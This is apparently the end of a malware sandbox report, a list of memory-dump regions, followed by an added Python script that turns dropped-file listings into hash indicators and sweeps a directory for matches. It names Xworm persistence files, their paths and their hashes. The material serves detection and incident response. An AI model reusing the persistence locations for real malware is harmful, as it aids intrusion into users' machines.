                            • memory/1156-388-0x000001596A3E0000-0x000001596A3EA000-memory.dmp
                              Filesize

                              40KB

                            • memory/2240-0-0x00007FFEC3173000-0x00007FFEC3175000-memory.dmp
                              Filesize

                              8KB

                            • memory/2240-1-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmp
                              Filesize

                              10.8MB

                            • memory/2240-38-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmp
                              Filesize

                              10.8MB

                            • memory/2240-13-0x000002361A710000-0x000002361A726000-memory.dmp
                              Filesize

                              88KB

                            • memory/2240-12-0x000002361A6E0000-0x000002361A6E8000-memory.dmp
                              Filesize

                              32KB

                            • memory/2240-7-0x000002367E040000-0x000002367E062000-memory.dmp
                              Filesize

                              136KB

                            • memory/4392-128-0x00000223F8410000-0x00000223F8486000-memory.dmp
                              Filesize

                              472KB

                            • memory/4392-127-0x00000223F7F80000-0x00000223F7FC4000-memory.dmp
                              Filesize

                              272KB

                            • memory/4808-15-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmp
                              Filesize

                              10.8MB

                            • memory/4808-29-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmp
                              Filesize

                              10.8MB

                            • memory/4808-25-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmp
                              Filesize

                              10.8MB

                            • memory/4808-26-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmp
                              Filesize

                              10.8MB

                            • memory/5064-62-0x0000000000410000-0x0000000000418000-memory.dmp
                              Filesize

                              32KB
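The listing above is what a responder turns into a hunt: file paths plus digests, followed by memory regions that cannot be matched on disk. The following added example, written for this page and not part of the sandbox output, parses that exact layout into records, keeps only usable file IOCs, and sweeps a directory for SHA256 matches. Its sample input copies three dropped-file entries and one memory entry from above; the demo directory and its two files are constructed. One caveat it handles deliberately: the crashpad named-pipe entry carries the digests of zero bytes of input (d41d8cd9…, da39a3ee…, e3b0c442…), so a naive hash match would flag every empty file on the host.

```python
"""Parse a sandbox dropped-file listing into hash IOCs and sweep a directory.

Added example for this report, not part of the sandbox output. SAMPLE_LISTING
copies entries from the listing above; the demo directory is constructed.
"""
import hashlib
import os
import re
import tempfile
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Copied from the report above. The crashpad pipe entry is kept on purpose.
SAMPLE_LISTING = """
• C:\\Users\\Admin\\AppData\\Local\\Temp\\steamwebhelper.exe
  Filesize
  442KB
  MD5
  04029e121a0cfa5991749937dd22a1d9
  SHA256
  9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
• C:\\Users\\Admin\\AppData\\Roaming\\startup_str_164.vbs
  Filesize
  115B
  MD5
  d205a237870aa23dc12fc98f1f45d49a
  SHA256
  1d9e9b82693d1be7c72ccaace065b82ed70debd5ca63624bec87f61480822334
• \\??\\pipe\\LOCAL\\crashpad_1868_OEQYIURTMLMWBTNJ
  MD5
  d41d8cd98f00b204e9800998ecf8427e
  SHA256
  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
• memory/1156-129-0x0000015969E60000-0x0000015969E6C000-memory.dmp
  Filesize
  48KB
"""

HASH_LABELS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
EMPTY_SHA256 = hashlib.sha256(b"").hexdigest()  # the e3b0c442... digest on the page


@dataclass
class DroppedFile:
    path: str
    size: Optional[str] = None
    hashes: Dict[str, str] = field(default_factory=dict)

    @property
    def is_memory_dump(self) -> bool:
        return self.path.startswith("memory/")

    @property
    def is_empty_file(self) -> bool:
        return self.hashes.get("sha256") == EMPTY_SHA256


def parse_listing(text: str) -> List[DroppedFile]:
    """Walk the '• path / Label / value' layout; blank lines are ignored."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    entries: List[DroppedFile] = []
    current: Optional[DroppedFile] = None
    i = 0
    while i < len(lines):
        line = lines[i]
        if line.startswith("•"):
            current = DroppedFile(path=line[1:].strip())
            entries.append(current)
        elif current is not None and i + 1 < len(lines):
            value = lines[i + 1]
            if line == "Filesize":
                current.size, i = value, i + 1
            elif line in HASH_LABELS:
                # Accept only a hex digest of the right width; anything else is layout noise.
                if re.fullmatch(r"[0-9a-fA-F]{%d}" % HASH_LABELS[line], value):
                    current.hashes[line.lower()] = value.lower()
                i += 1
        i += 1
    return entries


def file_iocs(entries: List[DroppedFile]) -> List[DroppedFile]:
    """Drop memory regions, entries without SHA256, and the empty-input digest."""
    return [e for e in entries
            if not e.is_memory_dump and "sha256" in e.hashes and not e.is_empty_file]


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(root: str, iocs: List[DroppedFile]) -> List[Tuple[str, str]]:
    """Return (local path, reported path) for files under root whose SHA256 is an IOC."""
    by_sha = {e.hashes["sha256"]: e.path for e in iocs if "sha256" in e.hashes}
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                digest = sha256_of(full)
            except OSError:
                continue  # locked or vanished; skip rather than abort the sweep
            if digest in by_sha:
                hits.append((full, by_sha[digest]))
    return hits


def demo_sweep() -> Tuple[int, int]:
    """Constructed demo dir: one empty file, one benign file.
    Returns (hit count with filtered IOCs, hit count with the raw listing)."""
    root = tempfile.mkdtemp(prefix="ioc_demo_")
    open(os.path.join(root, "empty.bin"), "wb").close()
    with open(os.path.join(root, "notes.txt"), "wb") as fh:
        fh.write(b"constructed benign content")
    entries = parse_listing(SAMPLE_LISTING)
    raw = [e for e in entries if "sha256" in e.hashes]
    return len(sweep(root, file_iocs(entries))), len(sweep(root, raw))


if __name__ == "__main__":
    for e in file_iocs(parse_listing(SAMPLE_LISTING)):
        print(e.size or "?", e.hashes["sha256"], e.path)
    print("hits (filtered, raw):", demo_sweep())
```

Run it as is and the raw listing flags the empty file while the filtered IOC set does not. For a real sweep, point `sweep()` at the user profile of a suspect host and feed it the full listing; the two Roaming `startup_str_164.*` entries and `%Temp%\steamwebhelper.exe` are the ones worth matching, since the `.bat` copy in Roaming has the same SHA256 as the submitted sample and the `.exe` is the configured Xworm install file.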